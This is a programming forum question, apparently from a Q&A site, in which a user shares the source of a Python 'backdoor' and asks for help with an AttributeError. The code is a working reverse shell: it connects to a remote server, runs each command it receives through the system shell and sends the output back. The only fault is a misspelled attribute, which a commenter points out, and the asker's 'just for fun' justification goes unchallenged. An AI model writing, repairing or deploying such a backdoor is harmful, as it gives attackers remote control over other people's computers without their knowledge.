# Python "AttributeError: 'Popen' object has no attribute 'sderr'" Error Python 3.9

Tags: python, malware

I'm trying to build my own python backdoor and when I want to send a command from my server to the user I get this:

> File "C:\Users\David\Desktop\python projects\rat python\backdoor\backdoor.py", line 15, in 
> output_error = op.sderr.read()
> AttributeError: 'Popen' object has no attribute 'sderr'

So here is the python file of the backdoor :

```
import socket
import subprocess

server_ip = '#IP'
port = #port
backdoor = socket.socket()
backdoor.connect((server_ip, port))


while True:
    command = backdoor.recv(1024)
    command = command.decode()
    op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
    output = op.stdout.read()
    output_error = op.sderr.read()
    backdoor.send(output + output_error)
```

If you have any idea why I get this error comment below.
Thanks,

Comment: Backdoor? What is this for?

Comment: I'm just trying to make a connection between my pc and a user. It's just for fun, I'm not using it in Illegal activities. I'm just trying to find out how it works

Comment: It's a typo; you misspelled `stderr`.

Comment: Thanks! I'm gonna be more carefull about misspelling next time, thanks for the help!